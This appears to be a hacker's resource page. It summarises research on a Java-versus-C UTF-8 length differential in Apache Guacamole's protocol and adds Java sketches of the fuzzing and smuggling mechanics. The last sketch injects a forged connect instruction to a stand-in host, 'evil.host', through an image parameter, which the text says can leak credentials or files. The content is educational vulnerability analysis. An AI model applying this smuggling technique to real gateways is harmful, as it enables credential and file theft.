Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Code Interoperability: The Hazards of Technological Variety

Stefan Schiller, posted 1 year ago
  • Apache Guacamole is a remote desktop gateway server. Its architecture consists of a Java web application in front of a C backend server (guacd). The article walks through a classic parser differential between these two components that leads to serious security impact.
  • All communication happens via the custom Guacamole protocol, a generic wrapper that abstracts RDP, VNC and SSH. Each instruction is a list of elements written as LENGTH.VALUE: the first element is the opcode and the rest are its arguments. Elements are separated by commas and the instruction ends with a semicolon. When initially connecting to a server, the select instruction is used. Most values are taken from a database, but the image type is directly controlled by a connecting attacker.
  • The documentation states that the LENGTH field is not the byte length but the number of Unicode code points in the UTF-8 value. Since UTF-8 handling differs between implementations and the characters are parsed in two places (Java and C), a bug is likely to lurk here. The article has a good description of what they mean by this: technological variety.
  • To test this, they wrote a small fuzzing harness. It generates random Unicode symbols and has both the Java and the C side process them; any difference between the two is a problem. After some fuzzing, they found that Java's length() disagreed with the C side: a single 4 byte UTF-8 character was counted as 2 in Java but as 1 in C. Why?
  • Since Java 9, strings use compact strings: each string is stored internally as either LATIN-1 or UTF-16, chosen dynamically based on its contents. For instance, 'A' is stored as LATIN-1, while the Greek beta (β) forces UTF-16. As a consequence, incoming UTF-8 data must be converted to one of these internal encodings, UTF-16 whenever it contains a non-LATIN-1 character.
  • String.length() is computed by shifting the size of the internal byte array right by the coder value. For LATIN-1 (coder 0) each character takes one byte, so the size is returned as-is; for UTF-16 (coder 1) the size is divided by 2. For 1, 2 and 3 byte UTF-8 sequences this works fine, since each becomes a single UTF-16 code unit. However, there is a subtle issue with 4 byte UTF-8 sequences.
  • In particular, the conversion turns a 4 byte sequence into a surrogate pair, two UTF-16 code units, instead of a single code unit. Java's length() returns the number of UTF-16 code units rather than code points, so this one character is counted twice and Java reports a larger length than the C side, which counts code points. Weird!
  • To exploit this, we have to think about how the data is parsed. The Java side creates the instruction and the C side then parses it, in that order. The blog post has some amazing graphics for understanding this, so please refer to them. The idea is to send two GUAC_IMAGE parameters: one containing four 4 byte Unicode characters and the other containing the payload we want to smuggle in.
  • The Java service writes a length of 8 for the parameter with the four 4 byte characters. However, the C service counts each of these as a single code point! So, after the four characters it reads four more code points, which belong to the next element. The rest of the second parameter is then parsed as protocol syntax rather than as a value, which is where we smuggle in our input. By putting a semicolon followed by extra data, that data is interpreted as a new instruction!
  • What do we want to smuggle in, though? If we smuggle in a connect instruction, we can control the host that guacd connects to. This can be used to leak data, such as credentials. Alternatively, RDP drive redirection can be enabled to leak world-readable files on the server.
  • Integrating between different languages appears to be absolute hell for encoding. The post is amazing at explaining the differences between parsers and is super enjoyable for that reason. I personally don't like Guacamole's text-based wire format, as it is prone to these types of issues. Great read!
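The differential fuzzing idea from the notes above can be sketched in Java. This is a minimal sketch, not the authors' harness: the C side is simulated by counting UTF-8 lead bytes (every byte not of the form 10xxxxxx), which is an assumption standing in for guacd's real UTF-8 handling, and the class and method names are hypothetical.

```java
import java.nio.charset.StandardCharsets;
import java.util.Random;

public class LengthFuzzer {

    // Java-side count: String.length() returns the number of UTF-16 code units.
    static int javaLength(String s) {
        return s.length();
    }

    // Simulated C-side count: one code point per UTF-8 lead byte,
    // i.e. every byte that is not a continuation byte (10xxxxxx).
    static int utf8CodePoints(byte[] utf8) {
        int count = 0;
        for (byte b : utf8) {
            if ((b & 0xC0) != 0x80) {
                count++;
            }
        }
        return count;
    }

    // Draw a random Unicode scalar value, skipping the surrogate range D800-DFFF.
    static int randomCodePoint(Random rng) {
        while (true) {
            int cp = rng.nextInt(0x110000);
            if (cp < 0xD800 || cp > 0xDFFF) {
                return cp;
            }
        }
    }

    public static void main(String[] args) {
        Random rng = new Random(42); // fixed seed so runs are reproducible
        int mismatches = 0;
        for (int i = 0; i < 10_000; i++) {
            String s = new String(Character.toChars(randomCodePoint(rng)));
            int j = javaLength(s);
            int c = utf8CodePoints(s.getBytes(StandardCharsets.UTF_8));
            // Only code points above U+FFFF (4 byte UTF-8) should disagree.
            if (j != c && mismatches++ < 3) {
                System.out.printf("U+%04X: Java length()=%d, UTF-8 code points=%d%n",
                        s.codePointAt(0), j, c);
            }
        }
        System.out.println("mismatches: " + mismatches);
    }
}
```

Because the harness compares two independent counts of the same input rather than checking against a hand-written oracle, any disagreement at all is worth investigating, which is the core of differential fuzzing.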
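To make the compact strings arithmetic concrete, here is a small model of why a 4 byte UTF-8 character ends up with length 2. It is a simplified model, not JDK code: the coder choice and the internal byte array size are approximated with public APIs (getBytes with ISO_8859_1 and UTF_16BE), and only the final right shift mirrors the shape of String.length() in OpenJDK. The class and method names are hypothetical.

```java
import java.nio.charset.StandardCharsets;

public class CompactStringModel {
    static final int LATIN1 = 0; // coder values as used inside OpenJDK's String
    static final int UTF16 = 1;

    // Compact strings use LATIN-1 only if every char fits in one byte.
    static int coderFor(String s) {
        return s.chars().allMatch(c -> c <= 0xFF) ? LATIN1 : UTF16;
    }

    // Approximate size of the internal byte[] for the chosen coder.
    static int internalByteLength(String s) {
        return coderFor(s) == LATIN1
                ? s.getBytes(StandardCharsets.ISO_8859_1).length
                : s.getBytes(StandardCharsets.UTF_16BE).length;
    }

    // Same shape as String.length(): byte count shifted right by the coder.
    static int modeledLength(String s) {
        return internalByteLength(s) >> coderFor(s);
    }

    public static void main(String[] args) {
        // 1, 2, 2, 3 and 4 byte UTF-8 characters: A, e-acute, beta, euro sign, emoji
        for (String s : new String[] {"A", "\u00E9", "\u03B2", "\u20AC", "\uD83D\uDE00"}) {
            System.out.printf("U+%04X utf8Bytes=%d coder=%d internalBytes=%d length=%d codePoints=%d%n",
                    s.codePointAt(0), s.getBytes(StandardCharsets.UTF_8).length, coderFor(s),
                    internalByteLength(s), modeledLength(s), s.codePointCount(0, s.length()));
        }
    }
}
```

Only the last row diverges: the emoji occupies 4 internal bytes as a surrogate pair, so the shift yields 2 while the code point count is 1.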
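The smuggling trick can be simulated end to end as a toy. This is hypothetical code, not Guacamole's: encode() plays the Java side and, when buggy is true, counts lengths with String.length(); parse() plays a code-point-counting C parser. The payload `;7.connect,9.evil.host` and the host evil.host are made up for illustration; a real connect instruction carries many more arguments, and this parser does no bounds checking.

```java
import java.util.ArrayList;
import java.util.List;

public class GuacDifferential {

    // Serialize one instruction as LENGTH.VALUE elements joined by ',' and ended by ';'.
    // buggy=true counts UTF-16 code units (String.length());
    // buggy=false counts Unicode code points, as the protocol documentation asks.
    static String encode(boolean buggy, String... elements) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < elements.length; i++) {
            String v = elements[i];
            int len = buggy ? v.length() : v.codePointCount(0, v.length());
            sb.append(len).append('.').append(v).append(i == elements.length - 1 ? ';' : ',');
        }
        return sb.toString();
    }

    // Parse a stream of instructions, reading LENGTH as a code point count (like the C side).
    // Assumes well-formed decimal lengths; no bounds checking in this sketch.
    static List<List<String>> parse(String data) {
        int[] cps = data.codePoints().toArray();
        List<List<String>> instructions = new ArrayList<>();
        List<String> current = new ArrayList<>();
        int i = 0;
        while (i < cps.length) {
            int len = 0;
            while (cps[i] != '.') {
                len = len * 10 + (cps[i] - '0');
                i++;
            }
            i++; // skip '.'
            current.add(new String(cps, i, len)); // take exactly len code points
            i += len;
            int terminator = cps[i++];
            if (terminator == ';') {
                instructions.add(current);
                current = new ArrayList<>();
            } else if (terminator != ',') {
                throw new IllegalArgumentException("unexpected terminator");
            }
        }
        return instructions;
    }

    public static void main(String[] args) {
        String emoji = "\uD83D\uDE00".repeat(4); // four U+1F600, 4 UTF-8 bytes each
        String smuggled = ";7.connect,9.evil.host"; // hypothetical payload
        String wire = encode(true, "image", emoji, smuggled);
        System.out.println(wire);
        System.out.println(parse(wire));
    }
}
```

With the buggy encoder the Java side writes `5.image,8.😀😀😀😀,22.;7.connect,9.evil.host;`. The code-point parser swallows `,22.` as part of the first value, then hits the `;` that opens the payload and returns two instructions, the second being the smuggled `connect` with argument `evil.host`. With encode(false, ...), the same input parses as a single image instruction with three elements.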